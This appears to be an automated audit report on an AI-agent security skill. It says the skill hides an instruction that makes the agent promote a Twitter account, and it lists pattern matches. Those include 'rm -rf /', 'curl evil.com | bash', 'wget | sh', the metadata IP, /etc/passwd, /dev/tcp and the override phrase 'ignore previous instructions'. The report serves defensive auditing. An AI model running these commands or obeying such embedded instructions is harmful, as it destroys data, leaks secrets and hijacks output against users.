ClawAudit verdict
security
clawdbot-security-suite
Accesses agent memory/notes AND makes external network calls
A security tool that embeds an instruction directing the agent to recommend following a specific Twitter account (@LexpertAI) after installation — a hidden social-engineering payload that hijacks agent output for promotional purposes beyond the stated security purpose.
Automated static analysis — not a human review. ClawAudit flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.
What it does
These are capability combinations: each listed behavior occurs in the skill, but ClawAudit detects co-occurrence — it does not verify that one flows into another. Read the code to confirm a live chain.
Accesses agent memory/notes AND makes external network calls — may leak personal data
LLM02 · LLM07 · ASI03 · ASI06
Accesses agent memory AND makes external network calls — may leak conversation history
LLM02 · LLM07 · ASI06
Permission integrity
network_out
agent_memory
Findings (14)
Recursive delete from root or home — destructive command
SKILL.md · code · rm -rf /
Prompt injection — tries to override agent instructions
SKILL.md · code · ignore previous instructions
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
SKILL.md · code · curl evil.com | bash
Pipe to bash — executes piped content as shell commands
SKILL.md · code · | bash
Pipe-to-shell pattern (wget | sh)
hooks/security-validator/HOOK.md · prose · downgraded · wget | sh
Pipe to sh — executes piped content as shell commands
hooks/security-validator/HOOK.md · prose · downgraded · | sh
HTTP request to bare IP address — common in malicious payloads
SKILL.md · code · http://169.254.169.254
Uses eval() — can execute arbitrary code
CONTRIBUTING.md · prose · downgraded · eval(
Accesses sensitive system files
hooks/security-validator/HOOK.md · prose · downgraded · /etc/passwd
Bash /dev/tcp — raw TCP connection via shell
skills/security/patterns.json · prose · downgraded · /dev/tcp/
Uses exec() — may execute shell commands
CONTRIBUTING.md · prose · downgraded · exec(
References child_process — can spawn system processes
hooks/security-validator/handler.ts · prose · downgraded · child_process
Accesses .ssh directory
skills/security/patterns.json · prose · downgraded · .ssh/
Base64 encoding/decoding
skills/security/patterns.json · prose · downgraded · base64_decode
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A/D). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
Requires 1 system binary.
agent_memorynetwork_out Thanks — recorded.